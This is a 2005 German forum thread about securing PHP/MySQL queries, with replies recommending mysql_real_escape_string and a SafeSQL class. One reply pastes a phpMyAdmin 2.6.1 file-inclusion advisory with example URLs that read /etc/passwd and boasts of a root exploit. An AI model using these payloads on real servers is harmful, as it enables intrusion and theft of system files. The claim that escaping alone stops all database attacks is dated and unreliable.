Impressum · Kontakt · Hilfe
Besucher online · Mitglieder



Antwort
 
Themen-Optionen
Alt 06.10.2005, 15:28   Nach oben    #1
bob
o_O
 
Registriert seit: 18.08.2005
Ort: Essen
Beiträge: 159
Standard MySql Abfrage/verbindung sicher machen

Hallo,
ich hab ne ganz einfache Frage, mit welchen Funktionen kann ich meine Abfrage in MySql so sicher wie möglich machen?
Also, das nich jedes Script Kiddie etwas anstellen könnte.

Ich hoffe Ihr wisst was ich grundlegendes meine .

Gruss
bob
__________________
Grüsse aus Essen,
bob
bob ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 06.10.2005, 16:18   Nach oben    #2
me pro ok?
 
Benutzerbild von Lars
 
Registriert seit: 07.09.2005
Ort: Pulheim bei Köln
Beiträge: 964
Standard

mysql_real_escape_string() auf jeden Wert, der in die Datenbank kommt.
__________________
Gedanken aus Draht stricken einen Zaun.
Lars ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 07.10.2005, 16:22   Nach oben    #3
Neuer Benutzer
 
Registriert seit: 18.08.2005
Beiträge: 2
Standard

Am besten gleich auf alle Daten, die du mit einer Datenbank verwendest (einfügen, abfragen, etc.), die Funktion auf der php.net Seite unter Punkt 3 verwenden: http://www.php.net/manual/en/functio...ape-string.php
Dann ist auch die Einstellung des Servers nicht mehr wichtig.
mfg RudiS
__________________
Kunst kommt von Können und nicht von wollen, denn sonst würde es ja Wunst heißen.
RudiS ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 07.10.2005, 16:36   Nach oben    #4
Projektleiter
 
Benutzerbild von Jann Hendrik
 
Registriert seit: 02.12.2004
Ort: Wildeshausen
Beiträge: 2.225
Standard

danke für den link!
__________________

Umfragen:
bitte beachten: Vorschläge für künftige Umfragen
Woher weißt du vom developers-guide?

Wenn du dich in ein interessantes Thema eingearbeitet hast, dann lass andere daran teilhaben! Schreibe ein Tutorial und beschreibe, wie es geht, was nicht klappt, wo man aufpassen muss usw.
Danke!
Jann Hendrik ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 07.10.2005, 23:35   Nach oben    #5
Igi
Benutzer
 
Benutzerbild von Igi
 
Registriert seit: 07.05.2005
Ort: nähe Münster
Beiträge: 33
Standard

ich nutze die SafeSQL-Klasse von phpinsider.com
http://www.phpinsider.com/php/code/SafeSQL/
__________________
http://redRogi.de
Igi ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 12.10.2005, 13:15   Nach oben    #6
bob
o_O
 
Registriert seit: 18.08.2005
Ort: Essen
Beiträge: 159
Standard

Schonmal rechtherzlichen dank!

Also ich verwende jetzt (richtig, nicht wie vorher) mysql_real_escape_string.
Das macht das ganze ja schon um einiges sicherer, so wie ich das gelesen hab.
Gibt es denn noch wichtige Sachen bei Abfragen bzw. Eintragungen in die DB was zu beachten?

Danke!
__________________
Grüsse aus Essen,
bob
bob ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 12.10.2005, 13:57   Nach oben    #7
me pro ok?
 
Benutzerbild von Lars
 
Registriert seit: 07.09.2005
Ort: Pulheim bei Köln
Beiträge: 964
Standard

Es gibt da eigentlich nur die SQL-Injection, und die wird mittels mysql_real_escape_string() verhindert.
__________________
Gedanken aus Draht stricken einen Zaun.
Lars ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Alt 12.10.2005, 14:52   Nach oben    #8
Goldman.de
 
Benutzerbild von J33d3X
 
Registriert seit: 09.10.2005
Ort: Frankfurt am Main
Beiträge: 190
Standard

hohohoh ....

da jips ganz lecker sachen
Date: 24.2.2005


- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Remote file inclusion ---

1.0

This bug exist in css/phpmyadmin.css.php. You can
include files. Error exist in

( wobei das ja mehr in richtung a php geht aber )

Code:
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' . 
$theme . '/css/theme_right.css.php'; 
if (@file_exists($tmp_file)) { 
include($tmp_file); 
} // end of include theme_right.css.php 
- ------ 

And now you can get files. 

For exemple: 

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd %00&theme=passwd%00 
http  ://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=pas swd%00 
etc.
hab da noch ein remote root exploit gefunden für ALLE gängigen MYSQL versionen
....
jupp richtig gehört festhalten und anschnallen remote root


aber zurück zum thema:
ich bin der auffassung das man ein ausgewogenes verhältniss/umgebung schafft
zwischen sicherheit aber auch ein bissel kompfort ( das soll nicht heissen globals on und dann feste nur noch mit extrakt & $$ ) nein aber ein gleichgewicht


mfg
J33d3X ist offline  
Add Post to del.icio.usBookmark Post in TechnoratiDiesen Beitrag zu Mister Wong hinzufügen!
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist An.
Smileys sind An.
[IMG] Code ist An.
HTML-Code ist Aus.
Trackbacks are An
Pingbacks are An
Refbacks are Aus

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
[Xampp 1.6.2] Mysql kann nicht geladen werden, oder doch?! kampfgnom Tools, Server, Betriebssysteme 10 14.07.2007 13:58
[Suche] MySQL Tool ähnlich MySQL Front ex³ Gesuche 5 22.12.2006 18:52
Connect to mySQL DB la-finest Datenbanken 7 29.06.2006 16:11
ssh tunnel zu einer mysql datenbank beny_mcde Datenbanken 4 07.06.2006 16:05
MySQL 5.1 kommt in die Beta-Phase Ben Nachrichten 1 02.03.2006 14:31


Alle Zeitangaben in WEZ +2. Es ist jetzt 13:04 Uhr.

Nach oben
Wir nutzen das Zend Framework, vBulletin (vBulletin v3.7.3, Copyright ©2000-2008, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0) und vBSEO.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44